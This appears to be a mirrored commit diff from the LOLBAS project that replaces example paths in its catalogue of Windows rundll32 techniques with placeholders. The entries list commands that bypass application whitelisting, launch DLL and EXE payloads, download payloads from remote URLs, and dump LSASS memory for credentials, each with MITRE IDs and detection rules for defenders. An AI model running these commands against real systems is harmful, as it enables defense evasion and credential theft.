mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
Wietze
GitHub
@@ -4,7 +4,7 @@ Description: Utility for installing software and drivers with rundll32.exe
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
|
||||
- Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,
|
||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
|
||||
Usecase: Run local or remote script(let) code through INF file specification.
|
||||
Category: AWL Bypass
|
||||
@@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: INF
|
||||
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
|
||||
- Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1,
|
||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
|
||||
Usecase: Run local or remote script(let) code through INF file specification.
|
||||
Category: AWL Bypass
|
||||
@@ -22,7 +22,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: INF
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.dll}
|
||||
Description: Launch a DLL payload by calling the RegisterOCX function.
|
||||
Usecase: Load a DLL payload.
|
||||
Category: Execute
|
||||
@@ -31,7 +31,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.exe}
|
||||
Description: Launch an executable by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
@@ -40,7 +40,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
|
||||
- Command: rundll32 advpack.dll, RegisterOCX {CMD}
|
||||
Description: Launch command line by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Desktop Settings Control Panel
|
||||
Author: Hai Vaknin
|
||||
Created: 2022-04-21
|
||||
Commands:
|
||||
- Command: rundll32.exe desk.cpl,InstallScreenSaver C:\temp\file.scr
|
||||
- Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}
|
||||
Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function.
|
||||
Usecase: Launch any executable payload, as long as it uses the .scr extension.
|
||||
Category: Execute
|
||||
@@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
|
||||
- Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}
|
||||
Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
|
||||
Usecase: Launch any executable payload, as long as it uses the .scr extension.
|
||||
Category: Execute
|
||||
|
||||
@@ -1,11 +1,11 @@
|
||||
---
|
||||
Name: Dfshim.dll
|
||||
Description: ClickOnce engine in Windows used by .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Author: Oddvar Moe
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
|
||||
Description: Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
@@ -19,8 +19,6 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
|
||||
Resources:
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: INF installer for Internet Explorer. Has much of the same functiona
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
|
||||
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1,
|
||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
|
||||
Usecase: Run local or remote script(let) code through INF file specification.
|
||||
Category: AWL Bypass
|
||||
@@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: INF
|
||||
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
|
||||
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1,
|
||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
|
||||
Usecase: Run local or remote script(let) code through INF file specification.
|
||||
Category: AWL Bypass
|
||||
@@ -22,7 +22,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: INF
|
||||
- Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
|
||||
- Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll}
|
||||
Description: Launch a DLL payload by calling the RegisterOCX function.
|
||||
Usecase: Load a DLL payload.
|
||||
Category: Execute
|
||||
@@ -31,7 +31,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
|
||||
- Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe}
|
||||
Description: Launch an executable by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
@@ -40,7 +40,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
|
||||
- Command: rundll32 ieadvpack.dll, RegisterOCX {CMD}
|
||||
Description: Launch command line by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
|
||||
@@ -4,9 +4,9 @@ Description: Internet Browser DLL for translating HTML code.
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
|
||||
- Command: rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url}
|
||||
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
|
||||
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Microsoft HTML Viewer
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
|
||||
- Command: rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta}
|
||||
Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)."
|
||||
Usecase: Launch an HTA application.
|
||||
Category: Execute
|
||||
@@ -16,8 +16,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\mshtml.dll
|
||||
- Path: c:\windows\syswow64\mshtml.dll
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
|
||||
Resources:
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Microsoft HTML Viewer
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe
|
||||
- Command: rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe}
|
||||
Description: Launch executable by calling the LaunchApplication function.
|
||||
Usecase: Launch an executable.
|
||||
Category: Execute
|
||||
@@ -16,8 +16,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\pcwutl.dll
|
||||
- Path: c:\windows\syswow64\pcwutl.dll
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
|
||||
|
||||
@@ -4,8 +4,8 @@ Description: Windows Script Component Runtime
|
||||
Author: Eral4m
|
||||
Created: 2021-01-07
|
||||
Commands:
|
||||
- Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe
|
||||
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe.
|
||||
- Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}
|
||||
Description: Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache.
|
||||
Usecase: Download file from remote location.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Windows Setup Application Programming Interface
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf
|
||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}
|
||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
|
||||
Usecase: Run local or remote script(let) code through INF file specification.
|
||||
Category: AWL Bypass
|
||||
@@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: INF
|
||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
|
||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}
|
||||
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
||||
Usecase: Load an executable payload.
|
||||
Category: Execute
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Shell Doc Object and Control Library.
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
|
||||
- Command: rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url}
|
||||
Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL.
|
||||
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
|
||||
Category: Execute
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Windows Shell Common Dll
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll
|
||||
- Command: rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll}
|
||||
Description: Launch a DLL payload by calling the Control_RunDLL function.
|
||||
Usecase: Load a DLL payload.
|
||||
Category: Execute
|
||||
@@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
|
||||
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe}
|
||||
Description: Launch an executable by calling the ShellExec_RunDLL function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
@@ -22,7 +22,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
|
||||
- Command: rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args}
|
||||
Description: Launch command line by calling the ShellExec_RunDLL function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
@@ -34,8 +34,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\shell32.dll
|
||||
- Path: c:\windows\syswow64\shell32.dll
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
|
||||
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Photo Gallery Viewer
|
||||
Author: Eral4m
|
||||
Created: 2021-01-06
|
||||
Commands:
|
||||
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
|
||||
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}
|
||||
Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
|
||||
Usecase: Download file from remote location.
|
||||
Category: Download
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Windows NT System Setup
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
|
||||
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}
|
||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
|
||||
Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
|
||||
Category: AWL Bypass
|
||||
@@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: INF
|
||||
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
|
||||
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}
|
||||
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
||||
Usecase: Load an executable payload.
|
||||
Category: Execute
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Internet Shortcut Shell Extension DLL.
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
|
||||
- Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta}
|
||||
Description: Launch a HTML application payload by calling OpenURL.
|
||||
Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
|
||||
Category: Execute
|
||||
@@ -13,9 +13,9 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: HTA
|
||||
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
|
||||
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
Usecase: Load an executable payload by calling a .url file with or without quotes.
|
||||
- Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url}
|
||||
Description: Launch an executable payload via proxy through a .url (information) file by calling OpenURL.
|
||||
Usecase: Load an executable payload by calling a .url file.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
@@ -31,7 +31,7 @@ Commands:
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
|
||||
- Command: rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe}
|
||||
Description: Launch an executable by calling FileProtocolHandler.
|
||||
Usecase: Launch an executable.
|
||||
Category: Execute
|
||||
@@ -61,8 +61,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\url.dll
|
||||
- Path: c:\windows\syswow64\url.dll
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
|
||||
Resources:
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: Compressed Folder library
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe
|
||||
- Command: rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe}
|
||||
Description: Launch an executable payload by calling RouteTheCall.
|
||||
Usecase: Launch an executable.
|
||||
Category: Execute
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: COM+ Services
|
||||
Author: LOLBAS Team
|
||||
Created: 2019-08-30
|
||||
Commands:
|
||||
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
|
||||
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full
|
||||
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
|
||||
Usecase: Dump Lsass.exe process memory to retrieve credentials.
|
||||
Category: Dump
|
||||
@@ -24,4 +24,3 @@ Resources:
|
||||
- Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
||||
Acknowledgement:
|
||||
- Person: modexp
|
||||
Handle:
|
||||
|
||||
Reference in New Issue
Block a user